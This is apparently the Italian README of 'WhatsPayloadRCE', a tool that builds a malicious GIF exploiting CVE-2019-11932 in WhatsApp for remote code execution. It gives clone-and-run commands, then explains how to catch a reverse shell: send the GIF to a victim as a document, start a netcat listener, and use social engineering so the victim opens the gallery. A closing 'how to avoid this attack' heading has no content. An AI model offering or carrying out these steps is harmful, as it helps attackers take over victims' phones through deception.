WhatsPayloadRCE
Questo è un Payload Generato Automaticamente per CVE-2019-11932 (Esecuzione di Codice Remoto su WhatsApp)
- Installa automaticamente GCC (comando innocuo, puoi vedere che è open-source)
- Salva in file .GIF
Come Usare ?
sudo apt install git
git clone https://github.com/Err0r-ICA/WhatsPayloadRCE
cd WhatsPayloadRCE && bash start
Schermata

Come Ottenere una Shell ?
- Invia semplicemente il file .GIF all'utente vittima COME DOCUMENTO NON COME IMMAGINE
- E imposta nc / netcat sulla porta che hai impostato nello strumento WhatsRCE {nc -lnvp your_port}
- Puoi usare un attacco di ingegneria sociale in modo che le vittime siano attratte a lanciare questo exploit
- Dì alla vittima di aprire la galleria tramite whatsapp e di inviare una qualsiasi foto. Dopo alcuni secondi riceverai una connessione shell dalla vittima
Come Evitare Questo Attacco?